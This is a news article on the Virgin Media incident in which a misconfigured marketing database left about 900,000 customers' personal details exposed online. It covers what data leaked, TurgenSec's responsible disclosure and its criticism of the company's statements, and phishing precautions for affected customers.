
Virgin Media Data Leak Exposes Details of 900,000 Customers

Yesterday, on the same day that US-based telecom giant T-Mobile admitted a data breach, UK-based telecommunications provider Virgin Media announced that it had also suffered a data leak incident, exposing the personal information of roughly 900,000 customers.

What happened?


Unlike the T-Mobile data breach, which involved a sophisticated cyber attack, Virgin Media said its incident was neither a cyber attack nor a hack of the company's database.

Rather, the personal details of around 900,000 UK-based Virgin Media customers were exposed after one of its marketing databases was left unsecured on the Internet and accessible to anyone without requiring any authentication.

"The precise situation is that information stored on one of our databases has been accessed without permission. The incident did not occur due to a hack, but as a result of the database being incorrectly configured," the company said in a note published on its website on Thursday night.

According to the notification, the exposed database was accidentally left unsecured on the Internet from April 19, 2019 (almost a year) and was recently accessed by an unauthorized party at least once.

What type of information was accessed?


The exposed database stored the information (listed below) on both customers and potential customers, including "fixed-line customers representing approximately 15% of that customer base," said Virgin Media CEO Lutz Schüler.

  • customer names,
  • home addresses,
  • email addresses,
  • phone numbers,
  • technical and product information, which includes any requests people may have made using forms on the company's website, and
  • dates of birth 'in a very small number of cases.'

"Please note that this is all of the types of information in the database, but not all of this information may have related to every customer," Virgin Media said.

The company assured its customers that the misconfigured marketing database did not include affected customers' account passwords or financial information such as credit cards or bank account numbers.

However, Schüler said the company doesn't know "the extent of the access or if any information was actually used."

Who Discovered the Data Leak?


The unguarded database was first discovered online by researchers at TurgenSec, who then responsibly reported it to Virgin Media's security team as per the National Cyber Security Centre (NCSC) cybersecurity guidelines.

Though Virgin Media has, surprisingly, not publicly acknowledged TurgenSec's findings, the researchers confirmed to The Hacker News that the leaked data includes at least 2,324,498 records concerning 900,000 people.

"We cannot speak for the intentions of their communications team but stating to their customers that there was only a breach of "limited contact information" is from our perspective understating the matter potentially to the point of being disingenuous," TurgenSec said in a statement.

According to the TurgenSec team, the leaked data also includes affected users':

  • IP addresses,
  • Requests to block or unblock various pornographic, gore and gambling websites, corresponding to full names and addresses,
  • IMEI numbers associated with their stolen phones,
  • Subscriptions to the different aspects of their services, including premium components,
  • Device type owned by the user,
  • The "referrer" header collected from the browsers, exposing which previous site users had visited before accessing Virgin Media.


What is Virgin Media now doing?


The company said the unauthorized access to the database was shut down immediately following the discovery and that it has launched a full independent forensic investigation to determine the extent of the breach.

The company is also contacting affected customers about the security failure and has already notified the Information Commissioner's Office.

What should affected customers do now?


Affected customers should be suspicious of phishing emails, which are usually the next step for cybercriminals holding such data and are used to trick users into giving away further details like their passwords and banking information.

"We urge people to remain cautious before clicking on an unknown link or giving any details to an unverified or unknown party. Online security advice and help on a range of topics are available on our website," Virgin Media said.

Though the compromised data doesn't include any banking or financial data, it is always a good idea to be vigilant and keep a close eye on your bank and payment card statements and report any unusual activity to your respective bank.

For more information regarding the security incident, Virgin Media customers can visit the company's website or call their customer service line on 0345 454 1111.
